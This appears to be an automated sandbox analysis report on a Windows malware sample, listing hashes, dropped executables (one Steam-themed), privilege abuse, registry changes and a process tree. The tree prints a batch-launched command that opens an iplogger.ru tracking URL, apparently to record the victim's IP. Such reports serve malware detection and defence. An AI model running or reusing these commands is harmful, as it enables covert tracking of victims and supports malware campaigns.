Analysis
-
max time kernel
109s -
max time network
189s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
26-11-2022 16:50
Static task
static1
Behavioral task
behavioral1
Sample
0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe
Resource
win10v2004-20220812-en
General
-
Target
0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe
-
Size
633KB
-
MD5
106257e4985825ee2d8fb474b5999c9f
-
SHA1
c73937163cb4016673bdf4de8cbd76e8b2c86b13
-
SHA256
0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad
-
SHA512
0ee6e75b370c672bf5a452ca43457287b32db9db9aaa4c7b17cf287f5da4458133816a6a5454261a463f2254c2ce6f5770ebd2e420680b8fbac7bf978354cc41
-
SSDEEP
12288:df4gJ24eNaIYW76MjR7SfGqXD8K45JiZcViZX:u4eNVj7hjRM83DiZWi
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
Result.exeÂèðóñ-Steam.exeÂèðóñ.exepid process 1404 Result.exe 1120 Âèðóñ-Steam.exe 1704 Âèðóñ.exe -
Loads dropped DLL 4 IoCs
Processes:
0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exeResult.exepid process 760 0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe 760 0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe 1404 Result.exe 1404 Result.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376272183" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6F0AF481-6DE6-11ED-A005-4ED4A804E0FC} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000256ed27e8919d04f83812f84ee5c95da00000000020000000000106600000001000020000000c5fe8501e882c1d2780220a774272595be7ea186720d81d66744c2408192a966000000000e800000000200002000000077c23a2f6ad5a9c7cd8a20f167ce11f58b01553133bb5ba14dc128b8e4d310df9000000017103564430f645ec90414176f680a2a5411da4fff0f00768f0a408b65ef1e3fbe0f21a68631d48543a1bb2e1d5555f5a2cb2363b4c27a4df0f2331e1ca7beb6d2121720e7bc84d49da4b68bc9338943aaf537e2762266cc818981dc10750381a84cc8b43d2581f67e8b2b61e98ed891894bd2476c2a3cd50a3113dabd916a0172d44344f7d2e1c77d3bf72f5ebbd06940000000dd7d5e7f0656fbb364141c7727364b2b5f0f5f0d84790e6a4870e63342e290b8a4467db3a359412a83f8de20ab9cf19f24b5d16010077362b4eb9fd2d7871151 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30760269f301d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000256ed27e8919d04f83812f84ee5c95da0000000002000000000010660000000100002000000094a3ba72b87c19ea4497b79912fb8472f42279a7251df7b8fd7434abc8a8955c000000000e8000000002000020000000bb3fdd15d4e638be1b3c558acca6c1dc62b9664daeff7bc622b90fc0b001fc11200000007f0966672451099a489700819fdbf6382d3243b4d17f4dbd37f96752a1993d5440000000a5cadb03ccd97ba1cb8e0917577ca9c3d554998314dc3cfd40aa489c6c5471454789fa21b1df42f5798d8a207dbcb22f5fcea6594c5cdeb8b20106eec5964ebb iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Âèðóñ.exeÂèðóñ-Steam.exepid process 1704 Âèðóñ.exe 1120 Âèðóñ-Steam.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
cmd.exeÂèðóñ-Steam.exeÂèðóñ.exedescription pid process Token: SeSystemtimePrivilege 1884 cmd.exe Token: SeSystemtimePrivilege 1884 cmd.exe Token: SeDebugPrivilege 1120 Âèðóñ-Steam.exe Token: SeDebugPrivilege 1704 Âèðóñ.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1660 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1660 iexplore.exe 1660 iexplore.exe 1744 IEXPLORE.EXE 1744 IEXPLORE.EXE 1744 IEXPLORE.EXE 1744 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exeResult.execmd.exeiexplore.exedescription pid process target process PID 760 wrote to memory of 1404 760 0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe Result.exe PID 760 wrote to memory of 1404 760 0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe Result.exe PID 760 wrote to memory of 1404 760 0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe Result.exe PID 760 wrote to memory of 1404 760 0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe Result.exe PID 1404 wrote to memory of 1120 1404 Result.exe Âèðóñ-Steam.exe PID 1404 wrote to memory of 1120 1404 Result.exe Âèðóñ-Steam.exe PID 1404 wrote to memory of 1120 1404 Result.exe Âèðóñ-Steam.exe PID 1404 wrote to memory of 1120 1404 Result.exe Âèðóñ-Steam.exe PID 1404 wrote to memory of 1704 1404 Result.exe Âèðóñ.exe PID 1404 wrote to memory of 1704 1404 Result.exe Âèðóñ.exe PID 1404 wrote to memory of 1704 1404 Result.exe Âèðóñ.exe PID 1404 wrote to memory of 1704 1404 Result.exe Âèðóñ.exe PID 1404 wrote to memory of 1884 1404 Result.exe cmd.exe PID 1404 wrote to memory of 1884 1404 Result.exe cmd.exe PID 1404 wrote to memory of 1884 1404 Result.exe cmd.exe PID 1404 wrote to memory of 1884 1404 Result.exe cmd.exe PID 1884 wrote to memory of 1660 1884 cmd.exe iexplore.exe PID 1884 wrote to memory of 1660 1884 cmd.exe iexplore.exe PID 1884 wrote to memory of 1660 1884 cmd.exe iexplore.exe PID 1884 wrote to memory of 1660 1884 cmd.exe iexplore.exe PID 1660 wrote to memory of 1744 1660 iexplore.exe IEXPLORE.EXE PID 1660 wrote to memory of 1744 1660 iexplore.exe IEXPLORE.EXE PID 1660 wrote to memory of 1744 1660 iexplore.exe IEXPLORE.EXE PID 1660 wrote to memory of 1744 1660 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe"C:\Users\Admin\AppData\Local\Temp\0f16f8428bdf6655be7f22ac1448a3496287340dab3bfde7e9ed221ef920b3ad.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Âèðóñ-Steam.exe"C:\Users\Admin\AppData\Local\Temp\Âèðóñ-Steam.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Âèðóñ.exe"C:\Users\Admin\AppData\Local\Temp\Âèðóñ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Build.bat" "3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://iplogger.ru/1W4m4.jpg4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1660 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Build.batFilesize
76B
MD5629aa3737ab828c1daafdf9640fb87db
SHA1d7faccdedb4565617b425ead9bcfdbeb69adb28e
SHA25666af6a3f595399a501ece86f35cd706afc54fd7aa185996d19f835ce0adfa030
SHA512d5c61cea9e25c2c3619684e4902db6be9d3d248453f10dfc82fac0207e4b64f8f1ef9ab4ab64b88fa25dd6ac23048357d904bf965f2bcbc82fd49b16a0a3ce38
-
C:\Users\Admin\AppData\Local\Temp\Result.exeFilesize
1009KB
MD514fcd7a2a5495a7775bb86fff7029caa
SHA1611957b6f409d8d8dd20f122294d5e2be59847a3
SHA2569c9755b1d728f5bd5b57e3cfc4eadde041e5ad3d507bf728a20763c838318c13
SHA512b51e0e152cf8198bc93169fd717d69812cb0588945f893c13c572f4475dab406a32381e7b7798777e784d9b409f94a6eb934db1e54b0d3d0ac2ee40317547633
-
C:\Users\Admin\AppData\Local\Temp\Âèðóñ-Steam.exeFilesize
499KB
MD558ed1a53c7cf1074def7e0d18d8e9c39
SHA1a3b828620ae7f83af2fe944a485f6e77ce316237
SHA256b640b3fea133a236c5eced8985bb3fb0925eb7a22f3b6a6878ecb93a869f2a64
SHA51245819204ba576983aa1ef56357d1ecefa4939611317e98a85f51913782803f3415ffb3102dc778b31aafaa8a836d819c5453fe128f00f00bcfea923c5af3a3c0
-
C:\Users\Admin\AppData\Local\Temp\Âèðóñ-Steam.exeFilesize
499KB
MD558ed1a53c7cf1074def7e0d18d8e9c39
SHA1a3b828620ae7f83af2fe944a485f6e77ce316237
SHA256b640b3fea133a236c5eced8985bb3fb0925eb7a22f3b6a6878ecb93a869f2a64
SHA51245819204ba576983aa1ef56357d1ecefa4939611317e98a85f51913782803f3415ffb3102dc778b31aafaa8a836d819c5453fe128f00f00bcfea923c5af3a3c0
-
C:\Users\Admin\AppData\Local\Temp\Âèðóñ.exeFilesize
499KB
MD597761fa2232e16b836ffedb45b60c07d
SHA1af2c706dd04efab73f43850a32a70c5763eb8317
SHA256f5aee1739022f653cee3108062df3c5deec7a7a884f5a16053f47434abc2dd85
SHA5122b1e97bbbb7f2bfd762c085afa14bda97d62881fa2cb703d78488897a8bcadb72be4d9fddc665b98979b8f968fb6a97c99f220068223f95c112060d749a7e653
-
C:\Users\Admin\AppData\Local\Temp\Âèðóñ.exeFilesize
499KB
MD597761fa2232e16b836ffedb45b60c07d
SHA1af2c706dd04efab73f43850a32a70c5763eb8317
SHA256f5aee1739022f653cee3108062df3c5deec7a7a884f5a16053f47434abc2dd85
SHA5122b1e97bbbb7f2bfd762c085afa14bda97d62881fa2cb703d78488897a8bcadb72be4d9fddc665b98979b8f968fb6a97c99f220068223f95c112060d749a7e653
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0584MUNE.txtFilesize
608B
MD5e0247daad12fb78b2c49c031301373e0
SHA1442980a1908069df0e7ffb6597d6ed83e06ed280
SHA25681bd1e12dda51690b0690f04fd320f37c8d6795d4d17bd7f8c42d2228d05739c
SHA5127463420429811ac221646273a7b243b9c37c1daf69093c69cc12a9bce286bc297f5bd30aee094a9b7f414f54dafe1c5db98c4a7a6604a50c3e1cf8d8af50bceb
-
\Users\Admin\AppData\Local\Temp\Result.exeFilesize
1009KB
MD514fcd7a2a5495a7775bb86fff7029caa
SHA1611957b6f409d8d8dd20f122294d5e2be59847a3
SHA2569c9755b1d728f5bd5b57e3cfc4eadde041e5ad3d507bf728a20763c838318c13
SHA512b51e0e152cf8198bc93169fd717d69812cb0588945f893c13c572f4475dab406a32381e7b7798777e784d9b409f94a6eb934db1e54b0d3d0ac2ee40317547633
-
\Users\Admin\AppData\Local\Temp\Result.exeFilesize
1009KB
MD514fcd7a2a5495a7775bb86fff7029caa
SHA1611957b6f409d8d8dd20f122294d5e2be59847a3
SHA2569c9755b1d728f5bd5b57e3cfc4eadde041e5ad3d507bf728a20763c838318c13
SHA512b51e0e152cf8198bc93169fd717d69812cb0588945f893c13c572f4475dab406a32381e7b7798777e784d9b409f94a6eb934db1e54b0d3d0ac2ee40317547633
-
\Users\Admin\AppData\Local\Temp\Âèðóñ-Steam.exeFilesize
499KB
MD558ed1a53c7cf1074def7e0d18d8e9c39
SHA1a3b828620ae7f83af2fe944a485f6e77ce316237
SHA256b640b3fea133a236c5eced8985bb3fb0925eb7a22f3b6a6878ecb93a869f2a64
SHA51245819204ba576983aa1ef56357d1ecefa4939611317e98a85f51913782803f3415ffb3102dc778b31aafaa8a836d819c5453fe128f00f00bcfea923c5af3a3c0
-
\Users\Admin\AppData\Local\Temp\Âèðóñ.exeFilesize
499KB
MD597761fa2232e16b836ffedb45b60c07d
SHA1af2c706dd04efab73f43850a32a70c5763eb8317
SHA256f5aee1739022f653cee3108062df3c5deec7a7a884f5a16053f47434abc2dd85
SHA5122b1e97bbbb7f2bfd762c085afa14bda97d62881fa2cb703d78488897a8bcadb72be4d9fddc665b98979b8f968fb6a97c99f220068223f95c112060d749a7e653
-
memory/760-54-0x00000000757E1000-0x00000000757E3000-memory.dmpFilesize
8KB
-
memory/1120-61-0x0000000000000000-mapping.dmp
-
memory/1120-72-0x0000000000D40000-0x0000000000DC2000-memory.dmpFilesize
520KB
-
memory/1404-57-0x0000000000000000-mapping.dmp
-
memory/1704-64-0x0000000000000000-mapping.dmp
-
memory/1704-71-0x0000000000290000-0x0000000000312000-memory.dmpFilesize
520KB
-
memory/1704-73-0x0000000000240000-0x0000000000278000-memory.dmpFilesize
224KB
-
memory/1704-74-0x0000000000280000-0x0000000000286000-memory.dmpFilesize
24KB
-
memory/1884-68-0x0000000000000000-mapping.dmp